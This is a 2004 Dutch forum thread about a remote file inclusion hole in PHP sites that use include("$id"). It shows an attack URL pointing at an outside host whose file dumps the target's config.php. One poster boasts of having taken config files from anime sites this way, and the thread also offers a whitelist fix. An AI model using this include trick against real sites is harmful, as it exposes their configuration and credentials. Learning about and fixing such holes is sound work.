Veel "beginner" anime site gebruiken:
<? include ("$id"); ?> (Bedankt dennis)
Dit is een slecht script omdat je bestanden extern kan inladen.
Maar wat kan er gebeuren wanneer dit gebeurt?
Likes: 0
Veel "beginner" anime site gebruiken:
<? include ("$id"); ?> (Bedankt dennis)
Dit is een slecht script omdat je bestanden extern kan inladen.
Maar wat kan er gebeuren wanneer dit gebeurt?
Laatst gewijzigd door ThePostman; 27/01/04 om 19:12.

<?php
include ("$id");
?>
index.php?id=http://www.hackxor.com/file.php
hackxor/file.php:Code:<?php show_source("config.php"); ?>
haha ik begrijp, kan het schade hebben tot de server?
Laatst gewijzigd door ThePostman; 27/01/04 om 18:39.

Op zich niet, maar op deze manier kun je code lezen uit de files waar de php-file toegang tot heeft. (Volgens mij)
http://gathering.tweakers.net/forum/...essages/741013 (kopje "Foute invoer controleren").
Lees dat stukje maar eens door, of beter, de complete pagina![]()
Kan een server niet beveiligd tegen zoiets zijn?
tis gewoon een kwestie van goed programmeren![]()
Haha maar als ik het uitprobeer op me een pagina van me site waar ik die include code heb geinstalleerd dan krijg ik deze error:Origineel geplaatst door electric
tis gewoon een kwestie van goed programmeren![]()
Warning: show_source() [function.show-source]: SAFE MODE Restriction in effect. The script whose uid is 1031 is not allowed to access /home/virtual/site75/fst/var/www/html owned by uid 0 in /home/virtual/site75/fst/var/www/html/file.php on line 9
2 verschillende hosts
Ik dacht zo dat er een beveiliging van de server zelf opzat. Maar dit zou wel niet kloppen als ik goed nadenk maar ik kan het niet onder woorden brengen.
die error krijg je door safemode omdat ie een script probeert te includen die niet onder de zelfde user staat. ( chown )
PHP Code:$p = $_GET["p"];
$arrPages = array ("news","content","link","etc");
if (empty($p))
{
$p = "news";
}
if (!in_array ($p, $arrPages))
{
$p = "error";
}
require_once("pages/".$p.".php");
je kan wel include maar complete source wordt niet gegeven vanuit de include, aangezien de andere php script niet op dezelfde server staat en de parser van server 2 hem toch niet ongeparsed uitpoept.

Dat klopt niet geheel hoor. Vaak wordt externe code gewoon uitgevoerd. Ik heb er aardig wat keren de config.php's van anime-sites mee achterhaald.
Wat bedoel je hiermee te zeggen?Origineel geplaatst door The MAzTER
PHP Code:$p = $_GET["p"];
$arrPages = array ("news","content","link","etc");
if (empty($p))
{
$p = "news";
}
if (!in_array ($p, $arrPages))
{
$p = "error";
}
require_once("pages/".$p.".php");

Dit is zeg maar een hele betrouwbare code. Alleen deze 4 waarden in de array worden geaccepteerd bij ?p=
Persoonlijk geef ik toch de voorkeur aan een veiliger multi-views solution.
topic niet goed gelezenOrigineel geplaatst door The Postman
Wat bedoel je hiermee te zeggen?
dacht dat je vroeg om een veilige manier